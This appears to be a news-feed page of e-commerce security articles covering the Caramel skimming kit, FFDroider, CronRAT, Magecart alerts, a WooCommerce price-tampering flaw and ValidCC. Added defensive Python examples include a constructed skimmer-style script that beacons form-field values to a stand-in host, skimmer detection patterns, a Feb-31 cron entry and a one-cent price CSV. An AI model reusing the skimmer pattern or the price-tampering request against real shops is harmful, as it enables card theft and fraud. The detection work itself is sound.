
Caramel Credit Card Theft is Proliferating Day by Day


A credit card stealing service is gaining traction, providing a simple and automated option for low-skilled threat actors to enter the sphere of financial fraud. Credit card skimmers are malicious scripts that are put into compromised e-commerce websites and wait patiently for customers to make a purchase. 

Following a purchase, these malicious scripts capture credit card information and transmit it to remote sites, where threat actors can collect it. Threat actors then use these cards to make online purchases for themselves or sell the card information to other threat actors on dark web markets for as little as a few dollars. DomainTools found the new service, which claims to be run by a Russian criminal outfit called "CaramelCorp." 

Subscribers receive a skimmer script, deployment instructions, and a campaign management panel, which includes everything a threat actor needs to start their own credit card stealing campaign. Caramel only sells to Russian-speaking threat actors after a first verification procedure that weeds out individuals who use machine translation or are new to the sector. 

A lifetime subscription costs $2,000, which isn't cheap for aspiring threat actors, but it includes complete customer service, code upgrades, and growing anti-detection methods for Russian-speaking hackers. 

To harvest card data the skimmer uses JavaScript's setInterval() function, which exfiltrates whatever has been captured at fixed intervals. While this may not appear to be an efficient strategy, it collects information from abandoned carts as well as from completed purchases. Finally, campaigns are managed through a panel that lets the subscriber monitor the affected e-shops, configure the gateways that receive the stolen data, and more. 
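As an added, defender-side example (not code from the article or from any skimmer kit), the following Python script applies a static heuristic to page scripts: it looks for the combination the article describes, a setInterval() timer that reads form fields and hands them to a network sink, together with a host that differs from the shop's own domain. The two inline scripts, the first-party host name shop.example and the indicator patterns are constructed for the demonstration; the scan is a triage aid for a site owner reviewing third-party JavaScript, not a substitute for a Content Security Policy or subresource integrity.

```python
import re

# Constructed sample scripts; neither is real skimmer code. The first mimics the
# pattern in the article: a timer that periodically reads form fields and
# beacons them to a host that is not the shop's own.
SUSPICIOUS_JS = """
setInterval(function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  var img = new Image();
  img.src = 'https://stats-collector.example/p?d=' + btoa(JSON.stringify(d));
}, 5000);
"""

# A benign script that also uses a timer and the network, but never reads fields.
BENIGN_JS = """
setInterval(function () {
  document.getElementById('clock').textContent = new Date().toLocaleTimeString();
}, 1000);
fetch('https://shop.example/api/cart').then(function (r) { return r.json(); });
"""

# Constructed indicator patterns; each one alone is common in legitimate code.
INDICATORS = {
    "periodic_timer": re.compile(r"\bsetInterval\s*\("),
    "form_field_read": re.compile(
        r"querySelectorAll\s*\(\s*['\"](?:input|form)|\.value\b|new\s+FormData\s*\("),
    "network_sink": re.compile(
        r"new\s+Image\s*\(|sendBeacon\s*\(|XMLHttpRequest|\bfetch\s*\(|\.src\s*=\s*['\"]https?://"),
    "encoding": re.compile(r"\bbtoa\s*\(|\batob\s*\(|encodeURIComponent\s*\("),
}
HOST_RX = re.compile(r"https?://([A-Za-z0-9.-]+)")


def external_hosts(script, first_party):
    """Hosts referenced by absolute URLs that are not the shop's own domain."""
    return sorted({h for h in HOST_RX.findall(script) if h != first_party})


def scan_script(script, first_party="shop.example"):
    """Return indicator hits and a verdict; timer + field read + sink is the core triad."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    hosts = external_hosts(script, first_party)
    hits["third_party_host"] = bool(hosts)
    triad = hits["periodic_timer"] and hits["form_field_read"] and hits["network_sink"]
    return {
        "suspicious": triad,
        "score": sum(hits.values()),
        "hits": hits,
        "hosts": hosts,
    }


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_JS), ("benign", BENIGN_JS)):
        result = scan_script(src)
        print(f"{label}: suspicious={result['suspicious']} "
              f"score={result['score']} hosts={result['hosts']}")
```

The verdict requires all three parts of the triad, which is why the benign script, despite its timer and its fetch() call, is not flagged; the extra indicators only raise the score so that a reviewer can rank candidates.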

Caramel isn't new, and neither are skimming campaigns: in December 2020, Bleeping Computer discovered the first dark web posts offering the kit for sale. Caramel has since grown in popularity in the underground scene thanks to continued development and advertising. The existence of Caramel and similar skimming services lowers the technical barrier to starting and managing large-scale card skimming campaigns, which could increase the prevalence of skimmer operations. 

As an e-commerce user, one can defend against credit card skimmers by using one-time private cards, setting charging limits and restrictions, or simply using online payment methods instead of cards.

FFDroider: A New Malware that Hacks Social Media Accounts


FFDroider, a new kind of information stealer, has emerged; it steals cookies and credentials from browsers and hijacks the target's social media accounts. Like much other malware, FFDroider spreads through software cracks, free games and apps, and other files downloaded from torrent sites. When one of these downloads is installed, FFDroider is launched alongside it, disguised as the Telegram desktop app to avoid identification. Once running, the malware creates a Windows registry key named "FFDroider", which is where the malware got its name. 

FFDroider targets account credentials and cookies stored in browsers such as Chrome, Mozilla Firefox, Microsoft Edge, and Internet Explorer. For instance, the malware reads and parses the SQLite credential stores and Chromium SQLite cookie databases and decrypts their entries using the Windows Crypt API, specifically the CryptUnprotectData function. The process is similar for the other browsers: functions such as InternetGetCookieExW and IEGetProtectedModeCookie are used to steal the cookies of Microsoft Edge and Internet Explorer. 

"If the authentication is successful on Facebook, for example, FFDroider fetches all Facebook pages and bookmarks, the number of the victim's friends, and their account billing and payment information from the Facebook Ads manager," reports Bleeping Computer. Decrypting and stealing these cookies yields clear-text usernames and passwords, which are then sent to the C2 server in an HTTP POST request as part of the malware campaign. 

FFDroider differs from other password-stealing Trojans in that its operators are not interested in every account credential present in the browsers. Instead, they focus on stealing credentials for social media accounts and e-commerce websites, including Amazon, Facebook, Instagram, eBay, Etsy, Twitter, and the WAX Cloud wallet portal. Bleeping Computer reports, "after stealing the information and sending everything to the C2, FFDroid focuses on downloading additional modules from its servers at fixed time intervals."

NCSC Urges Customers to Stay Aware About Scams On E-commerce Platforms


The National Cyber Security Centre (NCSC) made a final request to customers ahead of the busiest shopping weekend before Christmas: be aware of fraud and data theft attacks. The GCHQ agency asked customers to secure their devices, be wary of unsolicited messages, and limit the amount of information they enter into online shopping and e-commerce websites. According to the banking body UK Finance, around €22 bn was spent online on Christmas shopping last year because of the Covid-19 pandemic. 

With the rise of the Omicron variant, 2021 probably saw a similar pattern, leaving more customers vulnerable online. The attacks may take many forms: phishing emails carrying fake shipping details, fake warnings about hacked accounts, or fake gift cards that require the user to share personal details in order to use the offer. Customers may also be contacted through social media messages and emails with "unbelievable" offers on popular discounted gift items, such as electronics. Once a customer falls for one of these tricks, they lose their money along with banking details and personal information, which are stolen by the attackers. 

According to the NCSC, the urge to buy last-minute presents during the festive season may be one reason customers fall victim to such attacks so easily. To stay safe, users can follow some practical steps, such as setting a strong password on a website before placing an order. It is advised to use strong, unique passwords with two-factor authentication for every account, especially banking, email, and payment services. Online customers are also advised to ignore unsolicited notifications, particularly messages linking to suspicious websites and to platforms that rely on credit card payment. 

Lastly, customers should log in as guests while making a purchase to avoid revealing too much personal information. As per NCSC, "if you think your credit or debit card has been used by someone else, let your bank know straight away so they can block anyone using it. Always contact your bank using the official website or phone number. Don't use the links or contact details in the message you have been sent or given over the phone."

CronRAT is a Linux Malware that Hides in Cron Jobs with Invalid Dates


Researchers have discovered a novel Linux remote access trojan (RAT) that uses a never-before-seen stealth approach that includes scheduling malicious actions for execution on February 31st, a non-existent calendar day. CronRAT, according to Sansec Threat Research, "enables server-side Magecart data theft that avoids browser-based security solutions." The RAT was spotted on multiple online stores, including the country's largest outlet, according to the Dutch cybersecurity firm. 

CronRAT takes advantage of the Linux task scheduler cron, which allows tasks to be scheduled on days that do not exist on the calendar, such as February 31st. Even though the day does not exist, cron accepts the date specification as long as it is correctly formatted, which means the scheduled task will never run. CronRAT relies on this to stay hidden. According to research released by Sansec, it hides a "sophisticated Bash programme" in the names of scheduled tasks. 

"The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st." 
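Added example, not part of Sansec's research or of the article: a Python audit that reads crontab text and flags entries whose day-of-month and month fields can never coincide (31 February, 31 April, and so on), plus commands carrying long base64-like blobs, which is where an encoded payload would sit. The sample crontab is constructed, and the base64 string in it is a harmless placeholder. One caveat the check does not cover: in Vixie-style cron, when both the day-of-month and the day-of-week field are restricted, an entry runs when either matches, so the day/month test reports what the schedule is designed to look like rather than guaranteeing that it never fires.

```python
import re

# Maximum day each month can have (February counted with leap years).
DAYS_IN_MONTH = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30,
                 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}
MONTH_NAMES = {m: i for i, m in enumerate(
    ["jan", "feb", "mar", "apr", "may", "jun",
     "jul", "aug", "sep", "oct", "nov", "dec"], 1)}
# Long runs of base64 alphabet inside the command part of an entry.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/=]{40,}")


def _atom(token, names):
    """One number or name inside a crontab field."""
    token = token.lower()
    return names[token] if token in names else int(token)


def expand_field(field, lo, hi, names=None):
    """Expand one crontab field (*, lists, ranges, steps, names) into a set of ints."""
    names = names or {}
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_txt = part.split("/", 1)
            step = int(step_txt)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            start, end = _atom(a, names), _atom(b, names)
        else:
            start = end = _atom(part, names)
        values.update(range(start, end + 1, step))
    return values


def unreachable_date(dom_field, month_field):
    """True when no (day-of-month, month) pair allowed by the entry exists on the calendar."""
    days = expand_field(dom_field, 1, 31)
    months = expand_field(month_field, 1, 12, MONTH_NAMES)
    return not any(d <= DAYS_IN_MONTH[m] for d in days for m in months)


def audit_crontab(text):
    """Scan crontab text; return (line_no, schedule, reasons) for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", "@")) or "=" in stripped.split()[0]:
            continue  # blank, comment, @reboot-style shortcut, or VAR=value assignment
        parts = stripped.split(None, 5)
        if len(parts) < 6:
            continue  # not a complete five-field entry
        minute, hour, dom, month, dow, command = parts
        reasons = []
        try:
            if unreachable_date(dom, month):
                reasons.append("day/month can never occur")
        except ValueError:
            reasons.append("unparseable day/month field")
        if BASE64_BLOB.search(command):
            reasons.append("base64-like blob in command")
        if reasons:
            findings.append((lineno, " ".join(parts[:5]), reasons))
    return findings


# Constructed sample crontab mirroring the date trick quoted from Sansec.
# The base64 text is a placeholder string, not a real payload.
SAMPLE_CRONTAB = """\
# constructed sample crontab
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
52 23 31 2 3 /bin/sh -c 'echo cGF5bG9hZC1wbGFjZWhvbGRlci1ub3QtcmVhbC1jb2RlLWp1c3QtYS1zYW1wbGU= | base64 -d'
30 1 31 4,6,9,11 * /opt/backup.sh
"""

if __name__ == "__main__":
    for lineno, schedule, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: [{schedule}] {', '.join(reasons)}")
```

In practice the function would be fed the output of `crontab -l` for every account on the host as well as the files under /etc/cron.d, since a server-side skimmer has no reason to limit itself to the web server's user.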

The RAT also employs a variety of obfuscation techniques to make analysis more difficult: it hides code behind layers of encoding and compression, and it implements a custom binary protocol with random checksums to get past firewalls and packet inspectors before contacting a remote control server and waiting for further instructions. According to the researchers, the attackers behind CronRAT can run any code on the infected system through this backdoor access. 

"Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface." 

Sansec describes the new malware as “a serious threat to Linux eCommerce servers” because of its capabilities: fileless execution, timing modulation, anti-tampering checksums, control via a binary, obfuscated protocol, a tandem RAT launched in a separate Linux subsystem, a control server disguised as a “Dropbear SSH” service, and a payload hidden in the names of legitimate cron scheduled tasks.

Software Flaw in E-Commerce Sites Abused by Hackers


The National Cyber Security Centre (NCSC) of the United Kingdom has notified the administrators of over 4,000 online retailers, warning that their sites had been compromised in Magecart attacks to steal consumers' financial information. 

In Magecart attacks (also known as web skimming, digital skimming, or e-skimming), malicious actors inject scripts known as credit card skimmers (aka payment card skimmers or web skimmers) into vulnerable online stores to harvest the payment or personal information customers submit on the checkout page. 

Eventually, the attackers would exploit this data in different financial and identity theft fraud operations, or they will auction it to the highest bidder on hacking or carding sites. 

"The National Cyber Security Centre – a part of GCHQ – proactively identified 4,151 compromised online shops up to the end of September and alerted retailers to these security vulnerabilities," the UK cybersecurity agency said. 

"The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform." 

NCSC has been monitoring these stores since April 2020, sending alerts to site operators and small and medium-sized organizations (SMEs) after finding the infected e-commerce sites through its Active Cyber Defence programme. 

During Black Friday and Cyber Monday affected online merchants were reminded to maintain Magento — and any other software they employ — up to date to prevent attackers from breaching their servers and compromising their online shops and customers' data. 

"We want small and medium-sized online retailers to know how to prevent their sites from being exploited by opportunistic cybercriminals over the peak shopping period," said Sarah Lyons, NCSC Deputy Director for Economy and Society. 

"It's important to keep websites as secure as possible and I would urge all business owners to follow our guidance and make sure their software is up to date," she added.

The organization also advises individuals and families who would like to buy online securely, to only purchase from trusted online retailers, utilize credit cards for online payments, and always be on the lookout for suspicious emails and text messages featuring offers that appear too good to be true. 

The US Cybersecurity and Infrastructure Security Agency (CISA) also issued security guidelines for staying safe while buying online. 

"On Black Friday and Cyber Monday the hackers will be out to steal shoppers' cash and damage the reputations of businesses by making their websites into cyber traps," said Steve Barclay, Chancellor of the Duchy of Lancaster. 

"It's critical, with more and more trade moving online, to protect your business and your customers by following the guidance provided by the National Cyber Security Centre and British Retail Consortium."

WooCommerce Multi Currency Bug Allows Customers to Modify the Cost of Items on Online Stores


A security flaw in the WooCommerce Multi Currency plugin might allow any consumer to alter product prices in online stores. WooCommerce Multi Currency enables consumers to switch currencies and assists the shop in accepting multi-currency payments. It is possible to set the exchange rate manually or automatically. The plugin may automatically detect the customer's location and display the price in their local currency. 

WooCommerce is a WordPress-based eCommerce plugin; the Multi Currency plugin from Envato, on the other hand, allows WooCommerce users to customise prices for foreign customers. On the Envato Marketplace, it has a total of 7,700 sales. 

According to Ninja Technologies Network (NinTechNet), the problem is a broken access-control vulnerability in Multi Currency version 2.1.17 and lower. It affects the “Import Fixed Price” feature, which lets eCommerce sites set custom prices that override any prices calculated automatically from the exchange rate. 

“The import function, import_csv(), is loaded by the wmc_bulk_fixed_price AJAX hook in the “woocommerce-multi-currency/includes/import-export/import-csv.php” script,” according to a NinTechNet analysis on Monday. “The function lacks a capability check and a security nonce, and therefore is accessible to all authenticated users, which includes WooCommerce customers.” 

Attackers could exploit the flaw by uploading a specially prepared CSV file containing a product's ID and the currency it is priced in; according to the researchers, this lets them change the price of one or more items. A comma-separated values (CSV) file stores data in tabular form. Most spreadsheet programmes, such as Microsoft Excel or Google Sheets, can open CSV files. They differ from other spreadsheet file types in that they hold only a single sheet and store no cell, column, or row formatting; formulas cannot be saved in this format either. 
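To show the fix NinTechNet's analysis points at (a capability check and a security nonce in front of the import handler), here is an added Python model of the handler; it is not the plugin's PHP and not WooCommerce's code. A CSV of product ID, currency and price is applied to a fixed-price table twice: once by a handler that only requires a logged-in user, mirroring the flaw, and once by a hardened handler that also demands the manage_woocommerce capability and a valid HMAC nonce bound to the user, the action and a time window. The user table, the secret, the nonce scheme (modelled on the shape of WordPress nonces, not their implementation) and the CSV are constructed for the example; in a real plugin the analogues are current_user_can() and wp_verify_nonce().

```python
import csv
import hashlib
import hmac
import io
import secrets
import time

# Constructed: a per-site secret standing in for WordPress's salts.
SERVER_SECRET = secrets.token_bytes(32)
NONCE_WINDOW = 12 * 3600                 # nonce lifetime: one 12-hour tick
IMPORT_ACTION = "wmc_bulk_fixed_price"   # the AJAX action named in the advisory


class Forbidden(Exception):
    """Raised when a request fails an authorization check."""


# Constructed user table with WordPress-style capabilities. A customer can log
# in ("read") but holds no store-management capability.
USERS = {
    "alice_customer": {"read"},
    "bob_manager": {"read", "manage_woocommerce"},
}


def make_nonce(user, action, now=None):
    """Short HMAC tied to user, action and time window (shape modelled on WP nonces)."""
    tick = int((time.time() if now is None else now) // NONCE_WINDOW)
    msg = f"{user}|{action}|{tick}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()[:16]


def verify_nonce(nonce, user, action, now=None):
    """Accept the nonce for the current window and the one before it."""
    now = time.time() if now is None else now
    return any(
        hmac.compare_digest(nonce, make_nonce(user, action, now - NONCE_WINDOW * i))
        for i in (0, 1)
    )


def parse_fixed_prices(csv_text):
    """Parse rows of product_id,currency,price; reject malformed or negative prices."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        price = float(row["price"])
        if price < 0:
            raise ValueError("negative price")
        rows.append((int(row["product_id"]), row["currency"].upper(), price))
    return rows


def apply_fixed_prices(csv_text, prices):
    """Overwrite the (product_id, currency) -> price table, as the import feature does."""
    for pid, currency, price in parse_fixed_prices(csv_text):
        prices[(pid, currency)] = price
    return prices


def import_csv_vulnerable(user, csv_text, prices):
    """Mirrors the flaw: the only gate is that the requester is logged in."""
    if user not in USERS:
        raise Forbidden("not logged in")
    return apply_fixed_prices(csv_text, prices)


def import_csv_hardened(user, nonce, csv_text, prices, now=None):
    """Fixed handler: capability check, then nonce check, then the import."""
    if user not in USERS:
        raise Forbidden("not logged in")
    if "manage_woocommerce" not in USERS[user]:
        raise Forbidden("capability check failed")
    if not verify_nonce(nonce, user, IMPORT_ACTION, now):
        raise Forbidden("nonce check failed")
    return apply_fixed_prices(csv_text, prices)


# Constructed CSV: a request that would set product 42 to one cent.
SAMPLE_CSV = "product_id,currency,price\n42,EUR,0.01\n"

if __name__ == "__main__":
    catalogue = {(42, "EUR"): 199.0}
    print("vulnerable:", import_csv_vulnerable("alice_customer", SAMPLE_CSV, dict(catalogue)))
    for who in ("alice_customer", "bob_manager"):
        try:
            nonce = make_nonce(who, IMPORT_ACTION)
            print(who, import_csv_hardened(who, nonce, SAMPLE_CSV, dict(catalogue)))
        except Forbidden as err:
            print(who, "rejected:", err)
```

The order of the checks matters: the capability test comes first because a valid nonce only proves that the request originated from the site's own pages, not that the user is allowed to perform the action; the nonce then blocks cross-site request forgery against a manager who does hold the capability.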

“The vulnerability is particularly damaging for online shops selling digital goods because the attacker will have time to download the goods,” they said. “It is important to verify every order because the hack doesn’t change the product’s price in the backend, hence the shop manager may unlikely notice it immediately.” 

Patching needs for WooCommerce users have been increasing recently. Envato's WooCommerce Dynamic Pricing and Discounts plugin was discovered to have two security vulnerabilities in late August, which may allow unauthenticated attackers to inject malicious code onto websites running unpatched versions. This can lead to a number of assaults, such as website redirection to phishing pages, the injection of malicious scripts on product pages, and so on.

E-Commerce Theft: Dark Web Card Payment Store ValidCC Shut Down

Valid CC, a dark web market run by a cybercrime group, had been hacking online merchants and stealing payment credentials for more than six years. Last week, it closed down abruptly: the owners of Valid CC say that a law enforcement operation seized their servers, aiming to take over the store's infrastructure. A number of online shops sell "card not present" (CNP) payment data on the internet. This payment data may be stolen from cards used at e-commerce stores, but it is mostly sourced from other cybercriminals and threat actors. 

In the case of Valid CC, however, experts believe that the store itself attacked and hacked hundreds of e-commerce merchants. The hackers seeded websites with hidden card-skimming code that stole personal information and payment credentials when customers went through the checkout stage. Group-IB, a Russia-based cybersecurity firm, published a report last year describing Valid CC's operations and noting that Valid CC was responsible for hacking around 700 e-commerce stores. Group-IB also identified another group, "UltraRank", responsible for attacking an additional 13 third-party suppliers that provided software components to online stores across Europe, America, and Asia. 

Experts believe that UltraRank orchestrated a series of cyberattacks that cybersecurity firms had earlier attributed to three different cybercrime groups. "Over five years….UltraRank changed its infrastructure and malicious code on numerous occasions, as a result of which cybersecurity experts would wrongly attribute its attacks to other threat actors,” said Group-IB. It adds, “UltraRank combined attacks on single targets with supply chain attacks.” Valid CC's front man on various platforms, a hacker who goes by the handle SPR, notified customers that the shop would be shut down from 28 January, following a law enforcement operation that sealed Valid CC's operations. 

According to SPR, Valid CC lost access to more than 600,000 unsold payment card accounts, a very heavy blow to the store's inventory. Valid CC also lost its proxy and destination servers, and now it cannot open and decrypt the back-end, says SPR. Group-IB reports, "the store’s official representative on underground forums is a user with the nickname SPR. In many posts, SPR claims that the card data sold in the ValidCC store was obtained using JS sniffers. Most of SPR’s posts are written in English, however, SPR often switches to Russian, while communicating with customers. This might indicate that ValidCC is probably managed by a Russian speaker." 

"Not Amazon" Canadian Website Takes on the Online Giant

The e-commerce giants, with their evidently endless collection and drive to deliver convenience along with affordable prices, have become an all-too-familiar and essential service for many consumers at the height of the ongoing global pandemic. 

While small businesses and local retailers have been ending up with nothing in this pandemic, the worldwide lockdowns, and restrictions, have been fruitful for the e-commerce market, especially for the Seattle-based e-commerce giant Amazon, which has made humongous profits in billions. 

The pandemic has exposed a mounting inequity between people and markets, and Ali Haberstroh brought it into focus. As the pandemic deepened, offline markets were closed while online shopping continued, creating an inequality that was highlighted by one Canadian woman who voiced her disapproval and fought back for the cause. 

“I just hate how much Jeff Bezos and Amazon are making billions off the backs of working-class people,” said Ali Haberstroh. “It seems to me they’re putting money over the wellbeing of people.” 

It was in late November 2020, as snow was turning the view from Ali Haberstroh’s apartment white, that the idea occurred to her. At the time, Canada was about to shut the market again as a second wave of lockdowns hit Canadian streets in an attempt to curb rising COVID-19 cases. 
In anticipation, the owner of a Toronto vintage clothing store, a friend of Ms. Haberstroh’s, had put together a list of other local vintage shops offering curbside pickup and delivery instead of shutting their doors. 

“It was a wake-up call,” Ms. Haberstroh, 27, said of the list, which reminded her how large retailers like Walmart, Costco, and Amazon had thrived during the pandemic while much smaller, local businesses had been increasingly forced to discontinue their operations. “I thought if there is one tiny thing I can do to help, then I should get on it.” 

Inspired by this idea, Haberstroh set out to build a more comprehensive list; she then created an Instagram post tagging independent businesses and shopkeepers across Toronto. She also launched a new website by the name “” — a URL she had bought for $2.99. 

Introduced as a local list to help keep small businesses alive, 'Not Amazon' was created “so you don’t have to give any money to Amazon this year!” her Instagram post read. 

“At first it started off as a bit of a joke, with the name, but soon I really wanted to make it like Amazon, having everything in one place,” she said. “I didn’t want people to have an excuse not to shop local.” 

So far, the website “” has accumulated more than half a million page views and features 4,000 participating businesses across Toronto, Halifax, Calgary, and Vancouver. 
Furthermore, the cause has gained worldwide acceptance, as thousands of store owners await Ms. Haberstroh’s approval of their submissions to the site. 

“In a big city like Toronto, where it feels like most businesses are local, I think it’s so easy to think these things will be here forever,” said Ms. Haberstroh, who works as a social media manager at a marketing firm and plans to expand her rebellious project 'Not Amazon' to even more cities. “You don’t think that they’re going to go anywhere.” 

“Small businesses have always made Toronto magical. They’re what makes this city what it is. And so I think we owe it to them to keep them alive,” she added.

E-Commerce Attacks Didn't Increase During Coronavirus Quarantine

Due to the COVID-19 pandemic, people across the globe have had to stay at home, and the quarantine has driven up online shopping figures. Even though most people are now shopping online for everything from food and groceries to daily essentials, web skimming attacks have not increased and, according to cybersecurity experts, are not expected to in the near term. Web skimming, also called Magecart attacks or e-skimming, is a kind of cyberattack in which the attacker inserts malicious code into an online store's website; when users enter their payment data during checkout, the attackers steal their credit card details.

Web skimming attacks became popular among hackers during 2017-18 and have been rising since then. When asked about the impact of large-scale online shopping on web skimming incidents, various cybersecurity experts and agencies all agree that web skimming attacks will not rise simply because more people, staying at home, are shopping and spending most of their time online. The reason is that hackers have long tried to breach prominent e-commerce websites and failed, while the number of web skimming incidents has remained constant over the years.

According to these experts, there is only one condition under which web skimming attacks can increase: when the number of online stores grows, giving hackers new sites to attack. Unless that happens, the rate of web skimming attacks will stay the same. Statistical analysis by Sanguine Security shows that web skimming attacks have in fact fallen slightly during the COVID-19 pandemic, though not every cybersecurity agency agrees with this data.

According to Jerome Segura, a web analyst at Malwarebytes, web skimming attacks on online stores have not increased, which is consistent with Sanguine Security's data. One explanation is that the number of online stores grew two or three months earlier, but nobody observed such attacks during that period. Another is that buyers prefer shopping at popular e-commerce websites, which are hard for hackers to breach.

Zomato successfully tests its drone technology

E-commerce companies and food-delivery platforms are globally believed to be among the first adopters of drone-based delivery.

Zomato, the online ordering and food delivery platform, on Wednesday announced that it has successfully tested its drone delivery technology. The test, which was conducted using a hybrid drone, was a part of the company's attempts to reduce the time taken to make a food delivery to its customers.

The first test saw Zomato make a drone-based food package delivery under restricted conditions, covering 5 km in 10 minutes and at peak speed of 80 kmph.

"The drone was tested last week at one of the remote sites approved by the DGCA. Such tests are done at very remote sites which are especially designed to conduct such tests," Zomato told IANS.

This comes months after the Gurgaon-headquartered firm acquired Lucknow-based drone startup TechEagle to reduce food delivery times and address other issues such as pollution and traffic. Zomato also revealed that it is forming a consortium, as per Director General of Civil Aviation (DGCA) guidelines, to carry out experimental Beyond Visual Line of Sight (BVLOS) drone operations.

However, the food aggregator did not reveal the exact location where the drone delivered the package.

According to the notification issued by Director General of Civil Aviation (DGCA) on May 13, interested companies have been asked to submit an Expression of Interest (EOI) to the DGCA for conducting experimental Beyond Visual Line of Sight operations (BVLOS) of Remotely Piloted Aircraft Systems (RPAS)/Unmanned Aircraft Systems (UAS).

Currently, while regulations prohibit payload carriage on drones along with disallowing drone operations outside visual line of sight, the government — while announcing rules for unmanned aerial vehicles (UAV) in August last — had said that the norms will be evolved with time as and when companies are able to exhibit newer technologies.

"The only possible way to reduce the average 30 minutes to 15 minutes is to take the aerial route. Roads are not efficient for very fast deliveries.